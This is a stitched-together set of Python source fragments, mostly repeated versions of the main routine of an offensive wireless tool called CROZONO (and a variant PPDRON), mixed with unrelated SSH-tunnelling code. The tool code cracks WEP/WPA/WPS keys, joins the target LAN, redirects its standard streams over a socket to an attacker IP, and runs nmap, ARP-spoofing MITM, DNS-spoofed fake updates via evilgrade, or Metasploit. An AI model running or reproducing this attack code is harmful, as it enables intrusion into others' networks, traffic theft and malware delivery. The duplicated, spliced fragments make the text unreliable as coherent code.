os.remove(LOG_FILE)
return key_found
def connect_with_password(host, user, password, ports):
global session
log.info('Connecting to {} using password'.format(host))
cmd = 'ssh -L {ports} {usr}@{host}'.format(ports=' -L '.join(ports),
usr=user,
host=host)
if session is None:
session = pexpect.spawnu(cmd, encoding='UTF-8')
set_up_logging()
else:
session.sendline(cmd)
try:
res = session.expect(get_expectations())
except pexpect.TIMEOUT:
# Ew, but I prefer to handle stuff below, all in the same place
print('GOING THROUGH EXCEPT')
res = 6
if res == 0:
session.waitnoecho()
session.sendline(password)
elif res == 1:
if verify_logged_in():
log.info('Password not needed')
return session.pid
else:
res = 4
elif res == 2:
session.sendline('yes')
session.expect(expectations.get('PASSWORD_REQUIRED'))
log.info('Added Public Key for {} to known_hosts'.format(host))
session.sendline(password)
elif res == 3:
log.error('Wrong password for {}! Aborting.'.format(host))
exit(1)
elif res == 4:
log.error('Host {} is unreachable. Aborting.'.format(host))
exit(1)
res = session.expect(get_expectations(), timeout=10) if res in (0, 2) else 4
if res in (1, 6):
if verify_logged_in():
log.info('Connected to {}'.format(host))
return session.pid
else:
log.error('Error while connecting to {}. Aborting.'.format(host))
exit(1)
elif res == 3:
# In case we had to add the PK to known_hosts
log.error('Wrong password for host {}! Aborting.'.format(host))
exit(1)
else:
log.error('Error while connecting to {}. Aborting.'.format(host))
log.error('Either run with logging activated, or SSH manually!')
exit(1)
def connect_with_key(host, user, key, ports):
global session
log.info('Connecting to {} using key'.format(host))
cmd = 'ssh -L {ports} -i {key} {usr}@{host}'.format(ports=' -L '.join(ports),
key=key.replace('~', os.path.expanduser('~')),
usr=user,
host=host)
if session is None:
session = pexpect.spawnu(cmd, encoding='UTF-8')
set_up_logging()
else:
session.sendline(cmd)
try:
res = session.expect(get_expectations())
except pexpect.TIMEOUT:
# Ew, but I prefer to handle stuff below, all in the same place
res = 5
if res == 0:
log.error('Got asked for a password when logging with key to {}. Cowardly aborting.'.format(host))
exit(1)
elif res == 1:
log.info('Connected to {}'.format(host))
return session.pid
elif res == 2:
session.sendline('yes')
elif res == 3:
log.error('Access denied for {} with key {}! Aborting.'.format(host, key))
exit(1)
elif res == 4 or res == 5:
log.error('Host {} is unreachable. Aborting.'.format(host))
exit(1)
res = session.expect(get_expectations())
if res == 1:
log.info('Connected to {}'.format(host))
return session.pid
else:
log.error('Error while connecting to {}. Aborting.'.format(host))
log.error('Either run with logging activated, or SSH manually!')
exit(1)
def main():
banner()
if not checks.check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not checks.check_wlan_attacks_dependencies():
exit(1)
args = parse_args()
info("CROZONO running...")
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER
settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
lan_mgr.connect_to_lan()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi --------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info("Target selected: " + settings.TARGET_ESSID)
if settings.TARGET_PRIVACY == 'WEP':
from src.attacks import wep_attack
info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID))
wep_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
from src.attacks import wpa_attack,wps_attack
info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wps_attack.check()
if wps:
info("WPS is enabled")
wps_attack.pixiedust()
if settings.TARGET_KEY is None:
warn("PIN not found! Trying with conventional WPA attack...")
wpa_attack.run()
else:
warn("WPS is not enabled")
wpa_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit(1)
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
else:
info("Open network!")
lan_mgr.connect_to_lan()
# -------------------- Acquired LAN range -----------------------------------------
lan_mgr.lan_range()
lan_mgr.get_gateway()
# -------------------- Connect to attacker and relay NMap info --------------------
if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'):
os.remove(settings.OS_PATH + '/cr0z0n0_nmap')
if not checks.check_lan_attacks_dependencies():
exit(1)
if settings.IP_ATTACKER is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL)
else:
warn("Attacker not defined! Ending up...")
exit()
# -------------------- Attacks --------------------
if settings.ATTACK == 'sniffing-mitm':
from src.attacks import sniffing_mitm
sniffing_mitm.run()
elif settings.ATTACK == 'metasploit':
from src.attacks import metasploit
metasploit.run()
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def run(self):
info("Running Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=subprocess.DEVNULL)
def main():
banner()
if not check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not check_wlan_attacks_dependences():
exit(1)
info("CROZONO running...")
args = parse_args()
if args.essid is not None:
if args.key is not None:
ap_target = False
ip_lan = connect(args.essid, args.key)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon, args.essid)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon)
# -------------------- Infiltrate wifi --------------------
if ap_target:
target_essid = ap_target.get('ESSID').strip()
target_bssid = ap_target.get('BSSID').strip()
target_channel = ap_target.get('channel').strip()
target_privacy = ap_target.get('Privacy').strip()
info("Target selected: " + target_essid)
if target_privacy == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(e=target_essid))
key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy))
wps = wps_check(target_bssid, iface_mon)
if wps:
info("WPS is enabled")
key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon)
if not key:
warn("PIN not found! Trying with conventional WPA attack...")
key = wpa_attack(target_bssid, target_channel, iface_mon)
else:
warn("WPS is not enabled")
key = wpa_attack(target_bssid, target_channel, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
else:
info("Open network!")
ip_lan = connect(target_essid, None, iface_mon)
# -------------------- Acquired LAN range --------------------
ip_lan = ip_lan.strip()
net = ip_lan.split('.')
range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'
# -------------------- Connect to attacker and relay nmap info --------------------
if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
os.remove(OS_PATH + '/cr0z0n0_nmap')
if not check_lan_attacks_dependences():
exit(1)
attacker = args.dest
if attacker is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((attacker, 1337))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN)
else:
warn("Attacker not defined! Ending...")
exit()
# -------------------- Attacks --------------------
attack = args.attack
if attack == 'sniffing-mitm':
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
proc = subprocess.call(["tshark", "-i", iface], stderr=DN)
elif attack == 'evilgrade':
modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
agent = OS_PATH + '/evilgrade/agent.exe'
for line in modules:
print(line.replace('\n', ''))
print("\n\n Select module to use: ")
plugin = input()
info("Thank you! Evilgrade will be executed!")
s.shutdown(1)
if os.path.exists('/etc/ettercap/etter.dns'):
call(['rm', '/etc/ettercap/etter.dns'])
etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
for line in etter_template:
line = line.replace('IP', ip_lan)
etter_dns.write(line)
etter_dns.close()
etter_template.close()
call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])
evilgrade = pexpect.spawn('evilgrade')
evilgrade.expect('evilgrade>')
evilgrade.sendline('configure ' + plugin)
evilgrade.sendline('set agent ' + agent)
evilgrade.sendline('start')
time.sleep(1)
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(EVILGRADE_ATTACK_TIME)
elif attack == 'metasploit':
info("Executing Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=DN)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def hardware_setup():
info("Setting interface to monitor mode")
iface = get_ifaces()[0]
iface_mon = toggle_mode_monitor(iface, True)
return iface_mon
def main():
banner()
if not checks.check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not checks.check_wlan_tools_dependencies():
exit(1)
args = parse_args()
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces(
)[0] if settings.INTERFACE is None else settings.INTERFACE
settings.DELAY = args.delay if args.delay is not None else settings.DELAY
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
settings.IP_ATTACKER = args.connect if args.connect is not None else settings.IP_ATTACKER
settings.LAN_DISCOVERY = args.discovery if args.discovery is not None else settings.LAN_DISCOVERY
settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK
delay = float(settings.DELAY) * 60
time.sleep(delay)
info("CROZONO running...")
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
lan_mgr.connect_to_lan()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi ------------------------------------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info("Target selected: " + settings.TARGET_ESSID)
if settings.TARGET_PRIVACY == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(
e=settings.TARGET_ESSID))
wep_modules = find_modules('wep')
for wep_module in wep_modules:
attack = import_module(wep_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
break
else:
pass
if settings.TARGET_KEY is None:
error("Key not found! :-(")
exit(0)
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wash.wash_scan()
if wps:
info("WPS is enabled")
wps_modules = find_modules('wps')
for wps_module in wps_modules:
attack = import_module(wps_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None:
if wps:
warn(
"PIN not found! :-( Running WPA/WPA2 attack modules..."
)
wpa_modules = find_modules('wpa')
for wpa_module in wpa_modules:
attack = import_module(wpa_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info("Key found!: {k} ".format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None: # still...
error("Key not found! :-(")
exit(0)
else:
lan_mgr.save_key()
lan_mgr.connect_to_lan()
else:
info("Open network!")
lan_mgr.connect_to_lan()
# -------------------- Acquired LAN range --------------------------------------------
lan_mgr.lan_range()
lan_mgr.get_gateway()
# -------------------- Connect to attacker and relay network info --------------------
if settings.IP_ATTACKER is not None:
info(
"Sending information about network to attacker ({ip}) and running attacks..."
.format(ip=settings.IP_ATTACKER))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
if settings.LAN_DISCOVERY is not None:
discovery = import_module(settings.LAN_DISCOVERY)
if discovery.check():
discovery.setup()
discovery.run()
else:
warn("Error to run LAN discovery module!")
else:
warn("Attacker not defined! Ending...")
exit(0)
# -------------------- LAN Attacks --------------------------------------------------
if settings.ATTACK is not None:
attack = import_module(settings.ATTACK)
if attack.check():
attack.setup()
attack.run()
else:
error("Error to run LAN attack module! Ending...")
exit(1)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def hardware_setup():
info("Setting interface to monitor mode")
toggle_mode_monitor(True)
mac_changer()
def hardware_setup():
info("Setting interface to monitor mode")
toggle_mode_monitor(True)
mac_changer()
def main():
global session
global logging
global disconnection_timeout
c = args.config
log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c)))
with open(c) as f:
config = yaml.load(f)
logging = config.get('logging')
tunnels = config.get('tunnels')
all_tunnels = []
[all_tunnels.append(Tunnel(t)) for t in tunnels]
hops = config.get('hops')
for i, hop in enumerate(hops):
pid_stack = []
key = list(hop.keys())[0]
h = hop[key]
hop = Hop(key, h, i)
tunnels = []
if hop.key_auth:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_key(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
else:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_password(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done')
log.info('Tunneling done:')
[log.info(t) for t in all_tunnels]
# TODO: Watch for broken pipe?
try:
input("Press ENTER to disconnect")
print()
except KeyboardInterrupt:
log.error('Getting out of here!')
disconnection_timeout = 0
for h in reversed(hops):
alias = list(h.keys())[0]
log.info("Disconnecting from {}".format(alias))
try:
r = logout(disconnection_timeout)
except KeyboardInterrupt:
log.warn("Hurrying up.")
r = None
disconnection_timeout = 0
if r:
log.info('Disconnected')
else:
log.warn('Connection forcefully closed')
try:
os.kill(pid_stack[0], signal.SIGKILL)
log.warn('Killed off remaining SSH process')
except ProcessLookupError:
pass
log.info('Done')
def connect(essid, key, iface_mon=None):
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
iface = get_ifaces()[0]
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
essid, key if key is not None else ''))
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1) # TODO: Necessary? - yep for Raspbian.
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write(
'key_mgmt=WPA-PSK\n'
) # TODO: Always wpa-psk? - No problem yet.
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface
],
stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
do_connect()
if get_current_essid(iface) != essid and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=essid))
do_connect()
if get_current_essid(iface) == essid:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915,
struct.pack('256s', bytes(iface[:15],
'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid,
i=ipaddr))
return ipaddr
else:
error(
'Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
exit(1)
def main():
banner()
if not check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not check_wlan_attacks_dependences():
exit(1)
info("CROZONO running...")
args = parse_args()
if args.essid is not None:
if args.key is not None:
ap_target = False
ip_lan = connect(args.essid, args.key)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon, args.essid)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon)
# -------------------- Infiltrate wifi --------------------
if ap_target != False:
target_essid = ap_target.get('ESSID').strip()
target_bssid = ap_target.get('BSSID').strip()
target_channel = ap_target.get('channel').strip()
target_privacy = ap_target.get('Privacy').strip()
info("Target selected: " + target_essid)
if target_privacy == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(
e=target_essid))
key = WEP_attack(target_essid, target_bssid, target_channel,
new_mac, iface_mon)
if key == False:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(
e=target_essid, p=target_privacy))
WPS = WPS_check(target_bssid, iface_mon)
if WPS == True:
info("WPS is enabled")
key = WPA_with_WPS_attack(target_bssid, target_channel,
iface_mon)
if key == False:
warn(
"PIN not found! Trying with conventional WPA attack..."
)
key = WPA_attack(target_bssid, target_channel, iface_mon)
else:
warn("WPS is not enabled")
key = WPA_attack(target_bssid, target_channel, iface_mon)
if key == False:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
else:
info("Open network!")
ip_lan = connect(target_essid, None, iface_mon)
# -------------------- Acquired LAN range --------------------
ip_lan = ip_lan.strip()
net = ip_lan.split('.')
range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'
# -------------------- Connect to attacker and relay nmap info --------------------
if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
os.remove(OS_PATH + '/cr0z0n0_nmap')
if not check_lan_attacks_dependences():
exit(1)
attacker = args.dest
if attacker is not None:
info(
"Sending information about network to attacker ({ip}) and running attacks..."
.format(ip=attacker))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((attacker, 1337))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
call([
'nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan,
range_net
],
stderr=DN)
else:
warn("Attacker not defined! Ending...")
exit()
# -------------------- Attacks --------------------
attack = args.attack
if attack == 'sniffing-mitm':
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
info("Executing MITM and Sniffing attacks between {g} and {m}...".
format(g=gateway, m=target_mitm))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
g=gateway, m=target_mitm, i=iface))
time.sleep(2)
#cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
proc = subprocess.call(["tshark", "-i", iface], stderr=DN)
elif attack == 'evilgrade':
modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
agent = OS_PATH + '/evilgrade/agent.exe'
for line in modules:
print(line.replace('\n', ''))
print("\n\n Select module to use: ")
plugin = raw_input()
info("Thank you! Evilgrade will be executed!")
s.shutdown(1)
if os.path.exists('/etc/ettercap/etter.dns'):
call(['rm', '/etc/ettercap/etter.dns'])
etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
for line in etter_template:
line = line.replace('IP', ip_lan)
etter_dns.write(line)
etter_dns.close()
etter_template.close()
call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])
evilgrade = pexpect.spawn('evilgrade')
evilgrade.expect('evilgrade>')
evilgrade.sendline('configure ' + plugin)
evilgrade.sendline('set agent ' + agent)
evilgrade.sendline('start')
time.sleep(1)
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(
g=gateway, m=target_mitm, i=iface))
time.sleep(EVILGRADE_ATTACK_TIME)
elif attack == 'metasploit':
info("Executing Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=DN)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def hardware_setup():
info("Setting interface to monitor mode")
iface = get_ifaces()[0]
iface_mon = toggle_mode_monitor(iface, True)
return iface_mon
def main():
banner()
report.initLog()
report.initReport()
if not checks.check_root():
error('You need root privileges to run PPDRON!\n')
report.saveLog('You need root privileges to run PPDRON!\n')
generateReport()
exit(1)
if not checks.check_wlan_tools_dependencies():
generateReport()
exit(1)
args = parse_args()
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces(
)[0] if settings.INTERFACE is None else settings.INTERFACE
settings.DELAY = args.delay if args.delay is not None else settings.DELAY
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
delay = float(settings.DELAY) * 60
time.sleep(delay)
report.saveLog('PPDRON running...')
info('PPDRON running...')
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi ------------------------------------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' +
settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY)
report.saveLog('Target selected: ' + settings.TARGET_ESSID +
' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' +
settings.TARGET_PRIVACY)
if settings.TARGET_PRIVACY == 'WEP':
report.TARGET_ATTACK = 'Fuerza bruta'
info('Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
report.saveLog(
'Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
wep_modules = find_modules('wep')
for wep_module in wep_modules:
attack = import_module(wep_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(k=settings.TARGET_KEY))
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
lan_mgr.save_key()
break
else:
pass
if settings.TARGET_KEY is None:
error('Key not found! :-(')
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
generateReport()
exit(0)
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2WPA' or settings.TARGET_PRIVACY == 'WPA2 WPA':
info('Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
report.saveLog(
'Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wash.wash_scan()
if wps:
info('WPS is enabled')
report.saveLog('WPS is enabled')
wps_modules = find_modules('wps')
for wps_module in wps_modules:
attack = import_module(wps_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
report.TARGET_ATTACK = 'Ataque al WPS'
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None:
if wps:
warn(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
report.saveLog(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
wpa_modules = find_modules('wpa')
for wpa_module in wpa_modules:
attack = import_module(wpa_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.TARGET_ATTACK = 'Ataque de diccionario'
break
else:
pass
if settings.TARGET_KEY is None: # still...
error('Key not found! :-(')
report.saveLog('Key not found! :-(')
generateReport()
exit(0)
else:
lan_mgr.save_key()
else:
info('Open network!')
report.saveLog('Open network!')
report.TARGET_ATTACK = 'Ninguno'
info('PPDRON has finished! Good bye! ;)')
report.saveLog('PPDRON has finished! Good bye! ;)')
generateReport()
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(
settings.INTERFACE, settings.TARGET_ESSID,
settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
'"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
